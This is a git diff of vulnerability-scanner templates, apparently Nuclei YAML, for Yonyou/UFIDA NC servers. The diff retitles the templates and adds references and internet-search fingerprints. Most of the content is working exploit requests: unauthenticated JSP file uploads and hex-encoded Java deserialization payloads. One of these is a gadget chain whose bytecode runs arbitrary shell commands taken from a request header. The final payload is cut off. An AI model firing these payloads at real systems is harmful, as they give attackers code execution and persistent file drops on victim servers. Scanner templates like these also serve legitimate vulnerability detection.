\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
similarity index 67%
rename from http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml
rename to http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
index 07994cca95..6c272f87c7 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
@@ -1,20 +1,25 @@
-id: yonyou-nc-accept-arbitrary-file-upload
+id: yonyou-nc-accept-fileupload
 
 info:
-  name: yonyou-nc-accept-arbitrary-file-upload
+  name: YonYou NC Accept Upload - Arbitray File Upload
   author: SleepingBag945
   severity: critical
-  description: 用友NC在accept.jsp文件处存在任意文件上传漏洞。
+  description: |
+    Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
-  tags: yonyou
+    - https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd
+  metadata:
+    max-request: 2
+    fofa-query: icon_hash="1085941792"
+    verified: true
+  tags: yonyou,nc,intrusive,fileupload
 
 http:
   - raw:
       - |
         POST /aim/equipmap/accept.jsp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
         Accept: */*
         Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
         Accept-Encoding: gzip
@@ -33,20 +38,13 @@ http:
       - |
         GET /{{randstr_3}}.jsp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip
 
-
     req-condition: true
     matchers:
       - type: dsl
         dsl:
           - "status_code_1 == 200"
           - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
-        condition: and
-
-
-
-# 可尝试启动并调用xpcmdshell执行命令
\ No newline at end of file
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
similarity index 66%
rename from http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml
rename to http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
index 0a9270d27f..35cd23cd7d 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
@@ -1,22 +1,26 @@
-id: yonyou-nc-baseapp-uploadservlet-deserialization-rce
+id: yonyou-nc-baseapp-deserialization
 
 info:
-  name: Yonyou NC BaseApp UploadServlet Deserialization RCE
+  name: Yonyou NC BaseApp UploadServlet - Deserialization Detect
   author: SleepingBag945
-  severity: critical
+  severity: high
   description: |
     Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands.
-  tags: rce
+  reference:
+    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json
+  metadata:
+    max-request: 1
+    fofa-query: app="Yonyou-UFIDA-NC"
+    verified: true
+  tags: yonyou,nc,fileupload,baseapp,deserialization
 
 http:
-  - raw:
-      - |
-        GET /service/~baseapp/UploadServlet  HTTP/1.1
-        Host: {{Hostname}}
-
+  - method: GET
+    path:
+      - "{{BaseURL}}/service/~baseapp/UploadServlet"
 
     matchers:
       - type: dsl
         dsl:
           - 'status_code_1 == 200 && contains(body_1,"java.io")'
-        condition: and
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
similarity index 73%
rename from http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml
rename to http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
index d814725950..e0948aa60f 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
@@ -1,33 +1,36 @@
-id: yonyou-nc-dispatcher-servlet-arbitrary-file-upload
+id: yonyou-nc-dispatcher-fileupload
 
 info:
-  name: Yonyou-NC ServiceDispatcherServlet Arbitrary File Upload
+  name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
   author: SleepingBag945
   severity: critical
-  description: Yonyou-NC FileReceiveServlet Arbitrary File Upload
-  tags: yonyou,nc
+  description: |
+    Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
+  reference:
+    - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
+  metadata:
+    fofa-query: icon_hash="1085941792"
+    verified: true
+  tags: yonyou,nc,intrusive
 
 http:
   - raw:
       - |
         POST /ServiceDispatcherServlet HTTP/1.1
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
         Content-Type: application/data
         Host: {{Hostname}}
         Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
 
         {{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}}
 
-        
       - |
         GET /ncupload/n2d19a.jsp HTTP/1.1
         Host: {{Hostname}}
 
-
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - "status_code_1 == 200"
           - "status_code_2 == 200 && contains(body_2,'just_a_test')"
-        condition: and
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml
deleted file mode 100755
index 9ed15f65c3..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: yonyou-nc-filereceiveservlet-arbitrary-file-upload
-
-info:
-  name: Yonyou NC FileReceiveServlet Aribitrary File Upload
-  author: bjxsec
-  severity: high
-  tags: yonyou,oa,bjxsec,yonyouoa
-  description: fofa   app="用友-UFIDA-NC" "/platform/yonyou-yyy.js"
-variables:
-  file_name: "{{to_lower(rand_text_alpha(8))}}.jsp"
-  file_content: "{{to_lower(rand_text_alpha(26))}}"
-http:
-  - raw:
-      - |
-        POST /servlet/FileReceiveServlet HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
-        Content-Type: multipart/form-data;
-        Referer: https://google.com
-
-        {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}t00ls.jsp{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
-      - |
-        GET /t00ls.jsp HTTP/1.1
-        Content-Type: application/x-www-form-urlencoded
-        Host: {{Hostname}}
-
-    req-condition: true
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(body_2, '{{file_content}}')"
-          - "status_code_1 == 200 && status_code_2 == 200"
-        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml
new file mode 100755
index 0000000000..2ffe88dd33
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml
@@ -0,0 +1,41 @@
+id: yonyou-nc-filereceiveservlet-fileupload
+
+info:
+  name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
+  author: bjxsec
+  severity: critical
+  description: |
+    An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
+  metadata:
+    max-request: 1
+    fofa-query: app="用友-UFIDA-NC"
+    verified: true
+  tags: yonyou,nc,fileupload,intrusive
+
+variables:
+  file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
+  file_content: "{{randstr}}"
+
+http:
+  - raw:
+      - |
+        POST /servlet/FileReceiveServlet HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data;
+
+        {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
+
+      - |
+        GET /{{file_name}} HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && status_code_2 == 200"
+          - "contains(body_2, '{{file_content}}')"
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
similarity index 66%
rename from http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml
rename to http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
index 14892e8603..192ab5ea24 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
@@ -1,13 +1,19 @@
-id: yonyou-nc-grouptemplet-file-upload
+id: yonyou-nc-grouptemplet-fileupload
 
 info:
-  name: yonyou-nc-grouptemplet-file-upload
+  name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
   author: SleepingBag945
   severity: critical
-  description: 用友NC任意文件上传
+  description: |
+    The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
   reference:
     - https://www.seebug.org/vuldb/ssvid-99547
-  tags: yonyou
+    - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
+  metadata:
+    max-request: 2  
+    fofa-query: app="用友-UFIDA-NC
+    verified: true  
+  tags: yonyou,nc,intrusive
 
 variables:
   v1: "{{rand_int(1,100)}}"
@@ -29,7 +35,7 @@ http:
       - |
         GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers-condition: and
     matchers:
       - type: dsl
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
index 1e9f7f67a8..4ad07a32fd 100644
--- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
@@ -1,22 +1,28 @@
 id: yonyou-nc-ncmessageservlet-rce
 
 info:
-  name: 用友NC NCMessageServlet反序列化漏洞
+  name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
   author: SleepingBag945
   severity: critical
-  description: 用友NC在处理客户端请求数据的过程中。在反序列化用户提供的数据时,没有足够的检查和过滤,可能导致恶意的反序列化操作,在操作系统上执行命令。安全研究员经过分析后,发现该系统存在反序列化的利用点较多。目前在官方公开漏洞修复方案为对已知利用点进行反序列化白名单控制,以及对部分利用链依赖进行修复。导致该系统后续出现类似问题的可能性依旧较大。
-  tags: yonyou,rce
+  description: |
+    UFIDA NC is in the process of processing client request data. Insufficient checking and filtering when deserializing user-supplied data can lead to malicious deserialization operations and execution of commands on the operating system. After analysis, security researchers found that the system has many exploit points for deserialization. Currently, the official vulnerability fix plan is to perform deserialization whitelist control on known exploit points and repair some exploit chain dependencies. The possibility of similar problems occurring in the system in the future is still high.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml
+  metadata:
+    max-request: 2
+    fofa-query: app="用友-UFIDA-NC
+    verified: true
+  tags: yonyou,rce,deserialization,nc
 
 http:
   - raw:
       - |
         POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
         Content-Type: multipart/form-data;
         X-T0KEN-INF0: set /A 987843129+808922377
         Accept-Encoding: gzip, deflate
-        
+
         {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}}
 
       - |
@@ -26,19 +32,13 @@ http:
         Content-Type: multipart/form-data;
         X-T0KEN-INF0: expr 987843129+808922376
         Accept-Encoding: gzip, deflate
-        
+
         {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F